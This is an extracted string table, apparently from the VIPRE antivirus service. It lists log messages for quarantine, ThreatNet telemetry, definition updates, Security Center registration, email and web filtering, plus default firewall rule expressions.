Error encrypting Suspicious file <%s> to <%s>. ThreatNet will not be updated.
Error removing file <%s>.
Suspicious threat file <%s> transfered to ThreatNet.
File transfer operation failed sending Suspicious file <%s> to ThreatNet. ThreatNet will not be updated.
Could not remove old Threatnet file <%s>. File is orphaned on the disk.
%Y/%m/%d
quarantine\QR{*.xml
Couldn't set threat engine's Quarantine callback. Operation failed.
Couldn't set threat engine's log callback. Operation failed.
Setting quarantine path to <%s>.
Setting Threat engine definitions folder location to <%s>.
Created TEL zip file (%s) for transfer to ThreatNet.
Deleted temp TEL zip file (%s).
Error renaming the temp TEL zip file (%s) to (%s).
Improperly formatted file path passed in. Unable to transfer file [%s].
TEL-{%s}
Created FPF zip file (%s) for transfer to ThreatNet.
Deleted temp FPQ zip file (%s).
Error renaming the temp FPF zip file (%s) to (%s).
Error adding FP file (%s) to zip file (%s). FP file will not be sent to ThreatNet.
FPF-{%s}
GetQuarantineFilePathFromID didn't return a path for Quarantine ID (%s). Threat file will not be sent to ThreatNet.
Quarantined threat file <%s> transfered to ThreatNet.
File transfer operation failed sending file <%s> to ThreatNet. ThreatNet will not be updated.
Error copying file <%s> to <%s>. ThreatNet will not be updated.
There wasn't a Quarantine item for APEventID (%s) might be a suspicious item that wasn't quarantined.
Error adding FP Quarantine trace file (%s) to zip file (%s). FP file will not be sent to ThreatNet. Will attempt to get remaining traces.
Error adding FP Quarantine Meta Data file (%s) to zip file (%s). FP file will not be sent to ThreatNet.
FPQ-%Y%m%d%H%M%S_
While saving the Private Config File (%s), InitObjectFromXmlBufferAndLog failed.
While saving the Private Config File (%s), SaveToFileAndLog failed.
While trying to write Service Config File (%s), received error.
ServiceConfig.xml
Incremented the %s counter to %d.
%Y-%m-%d
Failed to exec Process64.exe to enumerate the 64 bit processes.
Failed to retreive the RunningProcsList at (%s).
Retreived the RunningProcsList at (%s).
Exec'd Process64.exe to enumerate the 64 bit processes.
Path to program for reading 64 bit OS process list is (%s).
\x64\Process64.exe"
Error while reading the Private Config File (%s). Config file may not exist or is corrupted.
While trying to write a default Service Config File (%s), received error.
While reading the Service Config File (%s). Config file may not exist or is corrupted. Creating default config file for the Service controller.
CountScans.XML
CountCleanedScans.XML
CountCleanedAP.XML
CountCleanedEmailAV.XML
CountBlockedByFirewall.XML
Internet access is %s
SBAMUIConfig.xml
SocialWatchConfig.xml
Error [%d] (%s) occurred saving the Social Watch History to <%s>. The history of this scan will not be available.
\SW{%s}.xml
Not opted in to ThreatNet bypassing ThreatNet processing.
Setting Long Product Name from Short Product Name (%s).
Did not find the Email AV Bad Url Replacement message text. Cannot set sku specific config values.
Did not find the Email AV SMTP error string. Cannot set sku specific config values.
Did not find the SPURS Base URL string resource. Cannot set software update sku specific config values.
Did not find the ThreatNet telemetry Enterprise URL string resource. Cannot set sku specific config values.
Did not find the ThreatNet Send Enterprise URL string resource. Cannot set sku specific config values.
Did not find the ThreatNet Query Enterprise URL string resource. Cannot set sku specific config values.
Did not find the ThreatNet Enterprise URL string resource. Cannot set sku specific config values.
Did not find the SPURS base URL string resource. Cannot set sku specific config values.
Did not find the AutoGet URL string resource. Cannot set sku specific config values.
Did not find the Registration Update URL string resource. Cannot set sku specific config values.
Did not find the Registration URL string resource. Cannot set sku specific config values.
Setting Long Product Name (%s).
Setting Enterprise Long Product Name (%s).
Error setting Company (%s) Product (%s). Cannot set sku specific config values.
Firing System error state changed event. Error State is now [%s].
%u: %s
\EV%s%.02d.xml
%Y-%m-%dT%H:%M:%S
A client is logging a system event of type %d for subsystem %d.
APEvent <%s> transfered to ThreatNet.
File transfer operation failed sending APEvent: <%s> to ThreatNet. ThreatNet will not be updated.
FindFirstFile returned an error when we tried to find <%s>. There are no FP files to send to ThreatNet.
Could not delete FP file <%s>. File is orphaned on the disk but will be cleaned by the 30 day purge.
File transfer operation failed sending FP file <%s> to ThreatNet.
Found FP file to send to ThreatNet <%s>.
FP*.zip
FindFirstFile returned an error when we tried to find <%s>. There are no telemetry files to send to ThreatNet.
Found telemetry file to send to ThreatNet <%s>.
TEL*.xml
FindFirstFile returned an error when we tried to find <%s>. There are no Scan History file to send to ThreatNet.
Could not unlink Threatnet file <%s>. File is orphaned on the disk.
Could not process Suspicious Threat file for APEvent <%s>.
Could not process Quarantine Threat file for APEvent <%s>. Looking for Suspicious file.
Found APEvent xml file to send to ThreatNet <%s>.
Error removing file <%s>. Exceeded %d APEvent xml files to send to ThreatNet.
Exceeded %d APEvent xml files to send to ThreatNet. Removed APEvent xml file <%s>.
Found scan results file to send to ThreatNet <%s>.
20*.xml
FindFirstFile returned an error when we tried to find <%s>. There are no AP Event XML files to send to ThreatNet.
AP*.xml
Set the Service thread priority to %d. This should be THREAD_PRIORITY_LOWEST to minimize the impact of ThreatNet transfers on other applications.
Preparing to purge the quarantine. Days to keep = %d.
Delete of quarantined item with QId = [%s] failed.
Deleted quarantine item with QId = [%s].
Preparing to delete QId = [%s].
The results for quarantining a file is <%d>
The results for quarantining a file are <%d>
The results for quaranting a buffer are <%d>
Couldn't get quarantine record. QId=<%s>
Successfully got the quarantine record. QId=<%s>
Got size of quarantined record. quarantineItemSize=[%d]
Couldn't get quarantine item following szQID=<%s>
Successfully queried next quarantined item szQID=<%s>
Unkown quarantine action type [%d].
Found a full path trace to update in known bad apps = [%s], MoveToAlwaysAllowed = %s.
Found a threat to add to the always allow [%d].
The bulk trojan or AP Holding threat was asked to be added to the ignored threats list from QId = [%s]. That would be bad so adding to known good collection by path instead.
Checking threat traces for a file trace to unquarantine for QId = [%s], MoveToAlwaysAllowed = [%s].
Could NOT desrialize the quarantine data from the service for ID [%s]. Will not remove quarantine item from always blocked list.
Could NOT get the quarantine date for ID [%s]. Will not remove quarantine item from always blocked list.
Unquarantined failed, no client PID provided, QId = [%s], folder = [%s], MoveToAlwaysAllowed = [%s].
Unquarantined failed because impersonation failed, QId = [%s], folder = [%s], MoveToAlwaysAllowed = [%s].
Unquarantined with impersonation failed QId = [%s], folder = [%s], MoveToAlwaysAllowed = [%s].
Unquarantined with impersonation succeeded, QId = [%s], folder= [%s], MoveToAlwaysAllowed = [%s].
Unquarantined QId = [%s], folder= [%s], MoveToAlwaysAllowed = [%s].
Preparing to unquarantine QId = [%s], folder= [%s], MoveToAlwaysAllowed = [%s].
Processed %d quarantine queue items.
Invalid quarantine item action if %d.
3.0.1
1.0.0.1
Unable to delete file (%s).
Removing old software update download (%s).
\*.exe
Returning path to software update: (%s).
SoftwareUpdateConfig.xml
The configuration information was saved to file <%s>.
Just retrieved the SPURS latest version number of %s
Got software update file=<%s>.
Couldn't find any executables in the Download folder. Software update isn't available.
Software update enabled flag %s.
Current local software version is (%s).
Exception thrown by SPURS SDK on download: <%s>, continuing anyway. Thread will wait for next event.
Exception thrown by SPURS SDK on scheduled download: <%s>, continuing anyway. Thread will wait for next event.
Unknown dwWaitStatus [%u]. Ignoring this wait return.
Wait for event to start operation.
Vipre dll version is <%s>
definitions\vcore.dll
0.0.0.0
CSBThreatDefinitions::ReportClientUpdateStatus
Setting the this pointer for the ThreatDefinitions CoClass to <%x>.
Did not get the mutex but the wait returned with %d, so go ahead and scan.
Error retrieving Proxy values (Server = %s, Username %s, Password = %s or Port = %ld) from registry.
ProxyPort
ProxyPassword
Setting the event to wake up the threat definitions controller thread to check for threat defs. Is manual %s.
Undefined known state for file <%s>.
Couldn't get known state for file <%s> from threat engine. Leaving now.
Successfully added a one time schedule item for pre-scan threat defs update check at %s. The timer %s wake up the computer.
Deleted defs version file [%s] to force an update to a compatible definitions version.
Could not delete defs version file [%s]. The system may run with incompatible definitions until the next update.
Definitions\DefVer.txt
Current defs are version %d, which are newer than or equal to the min needed of %d, definitions version file was not deleted and we will not force an update.
Checking to see if this machine has the minimum required defs version needed. Minimum version required is %d, local version is %d.
%d (%s)
SBCSApplyDefinitionUpdate called back to see if we want to continue and returned (%s). Updates applied %d, total updates to apply %d, reload is (%s).
While trying to write the ThreatDefinitions Config File (%s).
Error while reading the Config File (%s). Config file may not exist or is corrupted, creating default config file.
ThreatDefinitionsConfig.xml
Couldn't save config data, dwError=<%d>. New settings were NOT saved into the file.
Error converting the config buffer from the client. Unable to save the configuration information to file <%s>. Error code was %d.
Threat definitions enabled flag %s.
CSBThreatDefinitionsImpl::ReportClientUpdateStatus
Using threat defs file in folder <%s>.
Performing a check for Threat definitions updates. Is manual %s.
Unable to apply update <%s>.
Apply of threat definitions update file <%s> succeeded.
Unable to manually apply update. There may be a problem with the definitions file (%s).
Unknown dwWaitStatus [%d]. Ignoring this wait return.
The event to check for a threat definition update before a scan was signalled for schedule item <%d>. Checking if an update is needed.
The scheduled check for a threat definition update event was signalled for schedule item <%d>. Checking if an update is needed.
Failed starting worker thread. Threat definitions controller is inoperable.
Error encountered deserializing the config information <%s>.
Unable to open the WSC / Action Center service using Service Control Manager, the WSC / Action Center service is not installed and our status will not be reported.
Unable to OpenService wscsvc. Vipre features may not be reported correctly in WSC.
Unable to OpenSCManager. Vipre features may not be reported correctly in WSC.
Unable to get Service settings config object. Vipre features will not be reported in WSC.
IsVipre returning %s.
QueryStatus returned apState [%d], apStatus [%d].
QueryStatus returned fwStatus [%d].
Couldn't terminate WSC thread. Windows Security Center status may not correctly reflect the state of the service.
Removed Firewall instance from WSC, hr=[%x].
Unable to Uninstall Firewall Class from WSC, hr=[%x].
Removed AntiSpyware instance from WSC, hr=[%x].
Unable to Uninstall AntiSpyware Class from WSC, hr=[%x].
Removed AntiVirus instance from WSC, hr=[%x].
Unable to Uninstall AntiVirus Class from WSC, hr=[%x].
CoCreateInstance for Firewall interface failed, hr=[%x]. Unable to remove our instance from WSC
Uninstalled Firewall from WSC, hr=[%x].
Unable to Uninstall Firewall from WSC, hr=[%x].
CoCreateInstance for AntiVirus interface failed, hr=[%x]. Unable to remove our instance from WSC
Uninstalled AntiVirus from WSC, hr=[%x].
Unable to Uninstall AntiVirus from WSC, hr=[%x].
CoCreateInstance for AntiSpyware interface failed, hr=[%x]. Unable to remove our instance from WSC
Uninstalled AntiSpyware from WSC, hr=[%x].
Unable to Uninstall AntiSpyware from WSC, hr=[%x].
Windows type is Vista or newer so we updated AntiSpyware state [%d] and (%s) to WSC.
Unable to write AS status to WSC, hr=[%x].
IsFirewallSKU returned true so we updated Firewall state [%d] to WSC, hr=[%x].
Unable to write FW status to WSC, hr=[%x].
IsVipreSKU returned true so we updated AntiVirus state [%d] and (%s) to WSC.
Unable to write AV status to WSC, hr=[%x].
IsFirewallSKU returned true so we updated Firewall state [%d] to WSC API.
Unable to write FW status to WSC, Failed UpdateStatus hr=[%x].
Unable to CoCreateInstance for FW with WSC, hr=[%x].
IsVipreSKU returned true so we updated AntiVirus state [%d] and (%s) to WSC API.
Unable to write AV status to WSC, Failed UpdateStatus hr=[%x].
Unable to CoCreateInstance for AV with WSC, hr=[%x].
Windows type is Vista or newer so we updated AntiSpyware state [%d] and (%s) to WSC API.
Unable to write AS status to WSC, Failed UpdateStatus hr=[%x].
Unable to CoCreateInstance for AS with WSC, hr=[%x].
SBAMWSC.EXE
Unable to update Windows Security Center with current status.
Registered FW product [%s] with display name [%s] with WSC, hr=[%x].
Unable to Register FW [%s] with display name [%s] with WSC, hr=[%x].
Registered AV product [%s] with display name [%s] with WSC, hr=[%x].
Unable to Register AV [%s] with display name [%s] with WSC, hr=[%x].
Registered AS product [%s] with display name [%s] with WSC, hr=[%x].
Unable to Register AS [%s] with display name [%s] with WSC, hr=[%x].
WSCConfig.xml
Invalid UpdateCheckIntervalHours value [%d] in WSC Config File.
FW state did not change. Current state is [%d]
FW state changed. Current state is [%d], new state is [%d]
AP state did not change. Current state is [%d]
AP state changed. Current state is [%d], new state is [%d]
WSC Controller is disabled and we tried to remove ourself from WSC and failed, maybe we were never installed into WSC [%x].
Note: Versions of Windows before Vista don't support AntiSpyware in Windows Security Center.
UpdateCheckInterval timer expired after [%d] hours.
Failed starting WSC thread. Windows Security Center status will not be updated.
CProxy_ISBActiveProtectionEvents<class CSBActiveProtection>::Fire_APReportingCB
CSBActiveProtection::OnAPReportingCB
Add of PID [%d] to AP failed with error %d.
Added PID [%d] to AP.
APConfig.xml
\Logs\ap.etl
Wrong user known type %d.
Couldn't encode the Hash for passing to the scan controller.
Received prompt ACK for msg_id [%s].
Message %s has been answered by the user
CSBActiveProtectionImpl::ReportCallback
report event has been received.
Extension in list is NOT in file. Removing it from the collection; Extension = [%s].
Adding file extension to collection; File ext = [%s].
Unable to decrypt extensions file [%s]. The extensions collection was NOT updated.
\apincl.dat
AP%s.xml
Registration Code Status is [%d], Enabled is [%s].
RegistrationConfig.xml
Install date is invalid. Deleting the SBAMConfig.dll file. This file determines the evaluation period.
File <%s> deleted
Could not delete file: %s
CheckInstallDateFile unable to get install date. Deleting the SBAMConfig.dll file. This file determines the evaluation period.
SBAMConfig.bin
There is a Registration Key in the config file or in the Registry. We don't need to request one from SKMS.
The registration key we received from SKMS returned an invalid status when we sent it back for an Update check. Will try request a key again on next check.
CheckRegistration returned (%s).
Couldn't get pointer to CSBRegistrationImpl instance. Will not be able to start Check Registration thread or check users regisrtration key status for the application.
There is a Registration Key in the Registry but not in the config file. Update the Config file, and get the key status from SKMS.
Failed starting thread. Application will not be able to verify registration key status.
Failed creating CheckRegistration event. Application will not be able to verify registration key status.
Failed creating m_hQuitCheckRegistrationThread event. Application will not be able to verify registration key status.
Registration thread DIDN'T start. Application will not be able to verify registration key status.
Registration Code Status is [%d].
Setting log level to %d.
Setting log roll over size to %d.
Setting log file count to %d.
Url <%s> contains a known %s domain.
Couldn't replace bad url link node; search and replace will be aborted and HTML will not be modified.
SBAntiPhishing::ProcessHTMLElement
Bad url link node successfully replaced.
HTML document successfully processed; no bad url link nodes were found.
HTML document successfully processed; %d bad url link nodes were replaced.
Exception occurred while trying to process the text; text will not be modified. (%S)
Text successfully processed; no bad urls were found.
Text successfully processed; %d bad urls were replaced.
Bad url successfully replaced.
{(((https?)|(ftp)://)|(www\.)|(ftp\.))([-A-Z0-9 &@#/%?=~_|!:,.;]*)([-A-Z0-9 &@#/$=~_|])}
CSBEmailAV::BadUrlAction
CSBEmailAV::IsBadUrlCheckingEnabled
CloseEmailWindowMsgText is NULL
CSBEmailAV::GetCloseEmailWindowMsgText
Invalid parameter: MessageAttachment = [%p], OriginalBufferSize = [%d], AttachmentName = [%p], DateTime = [%p], Subject = [%p]
Invalid parameter: Subject = [%p], Extension = [%p], Buffer = [%p], BufferSize = [%d]
CSBEmailAV::ScanTextForBadUrls
priority=<%d>, msg=<%S>
Expanding %%CRLF%%...
%CRLF%
Invalid %%PRODUCTVERSION%% [%s]
Replacing %%PRODUCTVERSION%% with [%s]
Invalid %%ATTACHMENTNAME%% [%s]
Replacing %%ATTACHMENTNAME%% with [%s]
Invalid %%THREATNAME%% [%s]
Invalid %%THREATDEFVERSION%% [%d]
Replacing %%THREATNAME%% with [%s]
Replacing %%THREATDEFVERSION%% with [%s]
Invalid %%VIPREVERSION%% [%s]
Replacing %%VIPREVERSION%% with [%s]
Invalid %%COMPANY%% [%s] or %%PRODUCT%% [%s]
Replacing %%COMPANY%% with [%s], %%PRODUCT%% with [%s]
Expanding %%COMPANY%% and %%PRODUCT%%...
%COMPANY%
Invalid %%PRODUCTLONG%% [%s]
Replacing %%PRODUCTLONG%% with [%s]
Expanding tokenized string; Text = [%s], Threat Name = [%s], Attachment Name = [%s]
cmclient1.dll
Failed to open file; key=<%s>, error=<%d>
Failed to read file; key=<%s>, error=<%d>
Failed to create file; key=<%s>, error=<%d>
Failed to write data; key=<%s>, error=<%d>
Failed to delete file; key=<%s>, error=<%d>
op=<%d>, key=<%s>, success=<%d>
EmailAVConfig.xml
Bad url definition file could not be loaded.
LoadBadUrlDefs
Bad url definition file was successfully loaded.
Couldn't copy known bad url dll from defs folder to install folder; will continue using previous dll.
Successfully copied known bad url dll from defs folder to install folder.
kbu.dll
EmailAV released known bad url dll.
Definitions were updated; we need to unload the known bad url dll, copy it from the defs to the install dir, and then reload it.
Returning undelivered subject prefix [%s]
Returning undelivered body text [%s]
CSBEmailAVImpl::GetCloseEmailWindowMsgText
Returning close email window message text [%s]
CSBEmailAVImpl::GetBadUrlReplacementText
Returning text to replace bad urls [%s]
Failed to quarantine the email message; subject=<%s>, filename=<%s>
Successfully quarantined the email message; subject=<%s>, filename=<%s>, cleaner result=<%d>, quarantine id=<%s>
.email
Failed to create client; error=<%d>
Failed to set client persist callback; error=<%d>
Failed to create client description; error=<%d>
Failed to set client description; error=<%d>
Failed to start client; error=<%d>
Failed to wait for client ready; error=<%d>
Failed to create catalog session; error=<%d>
IFailed to parse message; error=<%d>
Failed to query catalog session; error=<%d>
Failed getting threat id [%d] name
Got name <%s> for threat id [%d]
BadUrls collection
CSBEmailAVImpl::ScanTextForBadUrls
Returning text to append [%s]
Returning inbound text to append [%s]
Cloudmark scan %s; message %s spam
Sender=<%s> is not in the address list; scan the message for spam
Sender=<%s> is in the address list as allow; do not mark the message as spam
Sender=<%s> is in the address list as block; mark the message as spam
Scanning message for spam; subject=<%s>, date=<%s>, sender=<%s>
No threat definitions; attachment = [%s] will not be scanned
Buffer contains threat; nThreatId=[%u]
Unknown buffer; will attempt to %s it if a threat is detected
Failed to quarantine buffer; passing through unmodified
Detected non-cleanable pseudo threat; will attempt to %s it
Scanning attachment; MessageBuffer = [%p], OriginalBufferSize = [%d], strAttachmentName = [%s]
State changed from [%s] to [%s]
Arva failed to start : [%d]
Could not enable monitor [%d] on port [%d] : [%d]
WindowsLiveMail Support: [%s]
SHELL Executed to register WlMailApiCom.dll
-s WLMailApiCom.dll
SHELL Executed to register WlMailApiStore.dll
-s WLMailApiStore.dll
Failed to register [%s],WindowsLiveMail support Will not work
SHELL Executed to register WlMailApiInit.dll
-s WLMailApiInit.dll
regsvr32.exe
{93ABC5F0-879F-4400-9AE9-F2742A03A229}
EmailAV is configured to quarantine messages containing bad urls; make a backup of the original message now.
EmailAV is not configured to quarantine messages containing bad urls; do not make a backup of the original message.
Pseudo-bad url successfully replaced.
VIPRE_PSEUDO_BAD_URL
Unexpected result=<%d> while waiting for events
Unexpected result=<%d> waiting for config thread to stop; config thread will be terminated
Body did not contain bad url
Body contained bad url and was replaced
Bad url checking is disabled; message body will not be scanned.
Incorrect date/time passed [%s]. Cannot convert to a time_t value.
An invalid length or invalid buffer was passed into ReadFromFile.
Read all data from file <%s>.
d:d:d %d/%d/%d
%x %X
FindFirstFile did not succeed on path <%s>. No files were found.
Deleted (%s) - [%d] files remaining.
Error removing file (%s).
The (%s) list has (%d) items.
List is empty adding files (%s) to list.
%s\%s*.xml
SBAM.Common
Env var<%s> value too big(>%u)!
GetProcAddress('%s') failed
LoadLibrary('%s') failed
Failed to read env var<%s>
We have an error trying to build the envPath from %s
Rpcrt4.dll
Programmer error! The size of PIDs is NOT large enough! (index) %d > %u (size).
PID[d] = d <%s>.
Found process - d <%s> hTask16 (%d).
Found process - d <%s>.
NTVDM.EXE
VDMDBG.DLL
Kernel32.DLL
Successfully launched <%s> for user u <%u>.
DuplicateTokenEx 0xX dup(0xX).
OpenProcessToken 0xX token 0xX.
OpenProcess %u HANDLE 0xX.
OpenProcess failed for PID %d. Cannot run the command as a logged on user.
Trying to launch <%s> for user u <%u>.
Only handling the first %u users.
%u users found.
explorer.exe
CmdLine = <%s>.
ISBWebFilterEvents
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_ConfigChangeCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterStateChangeCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterStatsCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterPublishingCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterReportingCB
#SBWebFilter
Web Filter CoClass
CSBWebFilter::GetConfig
CSBWebFilter::SetConfig
WebFilterStatus is NULL
CSBWebFilter::GetWebFilterStatus
CSBWebFilter::EnableWebFilter
CSBWebFilter::DisableWebFilter
CSBWebFilter::WFResetToDefaults
CSBWebFilter::OnConfigChangeEvent
CSBWebFilter::OnWebFilterStateChangeEvent
CSBWebFilter::OnWebFilterStatsEvent
CSBWebFilter::OnPublishingEvent
CSBWebFilter::OnReportingEvent
CSBWebFilterImpl::StopThread
CSBWebFilterImpl::SetCoClassPtr
Failed to add the Port to the WebFilter collection. This Port will not be available.
Failed to clear the Ports in the WebFilter. The Ports collection could not be loaded in the WebFilter.
The Dirty flag is set for the Ports collection in the WebFilter Config file. The Ports collection will be reloaded in the WebFilter.
ApplyConfigPorts
The Dirty Flag was not set on the Ports Collection from the WebFilter Config file. Will NOT update the Ports settings in the WebFilter.
CSBWebFilterImpl::GetWebFilterStatus
This is a Firewall SKU and this function requires the WebFilter SDK, but WebFilter dll is not loaded! Unable to proceed.
SbWF:WebFilter
Event received from WebFilter module; adding to event queue
CSBWebFilterImpl::NotificationCB
Stats received from WebFilter module; adding to stats queue
CSBWebFilterImpl::StatsCB
Resetting all Web Filter settings back to the defaults for VIPRE Premium SKU.
Resetting all Web Filter settings back to the default settings for Enterprise SKU.
CSBWebFilterImpl::ResetDefaultSiteValues
Resetting all Web Filter settings back to the default settings for (%s) mode.
Unknown:%d
SbWebFilter.dll
WebFilterConfig.xml
CSBWebFilterImpl::SetDefaultConfigValues
Config file may not exist or is corrupted. Creating default config file for the Webfilter controller.
Web filter notification callback didn't include valid data pointer.
staticUrlInspectionCB
Web filter notification callback didn't include valid context pointer.
Web filter stats callback didn't include valid data pointer.
Web filter stats callback didn't include valid context pointer.
Failed to add the BadUrlBlockingException (%s) to the KnownGoodDomain collection. This BadUrlBlockingException will not be available.
The Dirty flag is set for the BadUrlBlockingExceptions collection in the WebFilter Config file. The BadUrlBlockingExceptions collection will be reloaded in the WebFilter.
ApplyConfigBadUrlBlockingExceptions
The Dirty Flag was not set on the BadUrlBlockingExceptions Collection from the WebFilter Config file. Will NOT update the BadUrlBlockingExceptions settings in the WebFilter.
Failed to add the UserKnownBadUrl (%s) to the KnownBadDomain collection. This UserKnownBadUrl will not be available.
The Dirty flag is set for the UserKnownBadUrls collection in the WebFilter Config file. The UserKnownBadUrls collection will be reloaded in the WebFilter.
ApplyConfigUserKnownBadUrls
The Dirty Flag was not set on the UserKnownBadUrls Collection from the WebFilter Config file. Will NOT update the UserKnownBadUrls settings in the WebFilter.
Updated WebFilter Info system configuration.
CSBWebFilterImpl::UpdateInfoConfig
SbWFInfo_UpdateConfig failed. Unable to update Web Filter Info system configuration, statistics may not be reported correctly.
SbWF_UpdateConfig failed. The WebFilter configuration was not correctly updated. The WebFilter may not function as expected.
Called SbWF_SetBlockPage(SbWF_BlockPage_BadUrl) with path (%s). The WebFilter will now use the blocked web page html.
CSBWebFilterImpl::LoadBlockPages
SbWF_SetBlockPage(SbWF_BlockPage_BadUrl) failed with path (%s). The WebFilter will not use the blocked web page html.
BlockedWebPage.htm
SbWF_Stop failed. The WebFilter may not function as expected.
CSBWebFilterImpl::StopWebFilter
SbWFInfo_Stop failed. The WebFilter may not function as expected.
Web Filter controller stopped.
CSBWebFilterImpl::StopController
WebFilter dll is not loaded!
the Webfilter config file
CSBWebFilterImpl::SaveConfigToDisk
the default webfilter config file
the webfilter config file
CSBWebFilterImpl::GetConfigObjectFromDisk
SbWFInfo_Start failed. Unable to start WebFilter.
Unable to read WebFilter Config information. Unable to start WebFilter.
CSBWebFilterImpl::StartWebFilter
SbWF_Start failed. Unable to start WebFilter.
CSBWebFilterImpl::ResetInfoConfig
Unable to read WebFilter Config information. Unable to reset the WebFilter Info Stats Update Frequency.
Out. WebFilter status = %u
Calling OnWebFilterStateChangeEvent().
WebFilter is already stopped.
Failed to stop the WebFilter.
Stopped the WebFilter.
The config file says to turn OFF the WebFilter.
UpdateInfoConfig failed. The WebFilter Info System frequency configuration was not correctly updated. The WebFilter may not report statistics as expected.
WebFilter is already running.
Failed to start the WebFilter.
Started the WebFilter.
The config file says to turn ON the WebFilter.
In. WebFilter status = %u
CSBWebFilterImpl::ApplyConfig
SbWF_SetLoggerCallback failed. Unable to configure WebFilter logging callback.
Resetting all Web Filter settings, user defined Ad Rules and predefined web sites back to the default settings.
CSBWebFilterImpl::WFResetToDefaults
Unable to read WebFilter Config information can't %s the WebFilter.
CSBWebFilterImpl::EnableWebFilter
the webfilter config object
CSBWebFilterImpl::GetConfig
CSBWebFilterImpl::SetConfig
Failed to get webfilter config object from disk; webfilter settings will not be updated
Failed to apply webfilter config settings; webfilter settings may be in an inconsistent state
Successfully applied webfilter config settings
Successfully loaded webfilter config from disk; applying its settings
CSBWebFilterImpl::DoConfigThread
Invalid hour %u. There are only 24 hours in a day. Did not accumulate webfilter statistics.
%Y-%m-%dT00:00:00
%s\%sWS_%s.xml
%Y%m%d
Couldn't add to %s. Folder is NULL.
web filter hourly stats file
WebFilter Stats XML
No listeners for Reporting event
Firing Reporting event
WebFilter event file
WF{%s}.xml
WebFilter Event XML
CSBWebFilterImpl::WebFilterThread
Failed starting the thread. Web filtering will not be operational.
CSBWebFilterImpl::StartThread
WebFilter dll successfully loaded
Could not load WebFilter dll; controller not started.
CSBWebFilterImpl::StartController
CProxy_ISBFirewallEvents<class CSBFirewall>::Fire_FWReportingCB
CSBFirewall::OnReportingEvent
Unknown event type in callback type = (%d)
Callback type = (%d) %s.
Packet To Unopened Port event type
SbFweIds_DeleteUserIDSRule for ID [%d] returned [%d]. Unable to delete user IDS rule.
Failed to add the Application Rule for [%s] to the firewall collection. This Rule will not be loaded into the Firewall.
Failed to add the Network rule (%s) to the firewall collection. This rule will not be loaded into the Firewall.
Failed to add the gateway address %s (%s) to the firewall collection. The gateway collection will not be loaded into the Firewall.
Failed to add the Zone (%s) to the firewall collection. The Zones collection will not be loaded into the Firewall.
Invalid or unknown Address type for zone (%s). This zone will not have any Address Addresses.
Product version %s
Dequeued the data object for dispatch for msgId %s. EventDispatcherThread did not handle this.
Event signaled 0xX. Received the data dequeue for msgId %s.
Timeout while waiting for the data dequeue event 0xX for msgId %s.
Error while waiting for the data dequeue event 0xX for msgId %s. Wait result: %u.
Waiting for data dequeue event 0xX for msgId %s.
Failed to signal the dispatch event 0xX for msgId %s. Not notifying the user.
Signaling the dispatch event 0xX for msgId %s.
Queued the data object for dispatch for msgId %s.
Failed to signal the dispatch event 0xX for msgId %s. Not reporting to the user.
Failed to create EventData object. Unable to process the Report Callback.
There is no dispatch event. Cannot report to the user.
CSBFirewallImpl::ReportCB
Network event report callback didn't include valid data pointer.
Threat Def version %s
Threat Def version %d, release date %s
Firewall event Report callback.
staticReportCB
Network event report callback didn't include valid context pointer.
Failed to add the firewall filter rule--id <%d> application <%s> description <%s>. This rule will not be available.
Unable to allocate the RemotePorts array from the Firewall Config file. The RemotePorts collection was not be loaded into the Firewall.
Unable to allocate the LocalPorts array from the Firewall Config file. The LocalPorts collection was not be loaded into the Firewall.
Setting Basic Firewall default IDS Rules to the settings for (%s) mode.
Setting Basic Firewall default Network Rules to the settings for (%s) mode.
sbagentdiagnostictool.exe
winlogon.exe
lsass.exe
sbamsvc.exe
Setting Basic Firewall default Application Rules to the settings for (%s) mode.
Setting Basic Firewall settings back to the settings for (%s) mode.
direc=out & (proto=TCP | proto=UDP) & (rport=137 | rport=138 | rport=139 | rport=445)
direc=in & (proto=TCP | proto=UDP) & (lport=137 | lport=138 | lport=139 | lport=445)
(proto=UDP & rport=88 & direc=out)
(proto=UDP & lport=88 & direc=in)
(proto=TCP | proto=UDP) & (rport=389 | rport=636) & direc=out
(proto=TCP | proto=UDP) & (lport=389 | lport=636) & direc=in
(direc=out & proto=47) | (proto=TCP & rport=1723 & direc=out) | (direc=out & proto=50) | (direc=out & proto=108)
(direc=in & proto=47) | (proto=TCP & lport=1723 & direc=in) | (direc=in & proto=50) | (direc=in & proto=108)
proto=UDP & rport=53 & direc=out
proto=UDP & lport=53 & direc=in
((lport=68 & rport=67) | (lport=67 & rport=68)) & proto=UDP & direc=out
((rport=68 & lport=67) | (rport=67 & lport=68)) & proto=UDP & direc=in
Ping and Tracert
Failed to signal the dispatch event (0xX).
Signaling the dispatch event 0xX.
kSbFwe.dll
Unable to create a blank app rule in the config object. Not setting the app rule for svchost.exe.
%WINDIR%\system32\svchost.exe
Unable to create a blank app rule in the config object. Not setting the app rule for winlogon.exe.
%WINDIR%\system32\winlogon.exe
Unable to create a blank app rule in the config object. Not setting the app rule for services.exe.
%WINDIR%\system32\services.exe
Unable to create a blank app rule in the config object. Not setting the app rule for lsass.exe.
%WINDIR%\system32\lsass.exe
%PROGRAMFILES%\Internet Explorer\iexplore.exe
SBPIMSvc.EXE
SBAgentDiagnosticTool.EXE
SBAMUI.EXE
SBAMSvc.EXE
Resetting all Basic Firewall settings back to the default settings for (%s) mode.
FirewallConfig.xml
FW SDK Version "%s"
%u.%u.%u
SbFwe_GetVersion returned SDK %u.%u.%u IDS %u.%u.%u
Loaded the Event Object for %s data from firewall.
Packet To Unopened Port Event.
SbFweInfo_UpdateConfig failed. Unable to update Firewall Info system configuration, statistics may not be reported correctly.
Failed to add the Disabled IDS Rule [%d] in the firewall. This rule will not be available.
Failed to update the Rules Path (%s). The Firewall may not be able to locate the correct Rules files.
SbFwe_EnableFilterRules failed. Filter Rules may not be (%s) as expected.
SbFwe_EnableNetworkRules failed. Network Rules may not be (%s) as expected.
SbFwe_EnableApplicationRules failed. Appplication Rules may not be (%s) as expected.
Failed to update the LogPacketsToUnopenedPorts setting. Packets To Unopened Ports may not be logged correctly.
Failed to update the Log Port Scans setting. Port Scan may not be logged correctly.
SbFweIds_Start failed. Unable to start IDS because the IDS system didn't have all the required data. Most likely the IDSRules.dat file is missing.
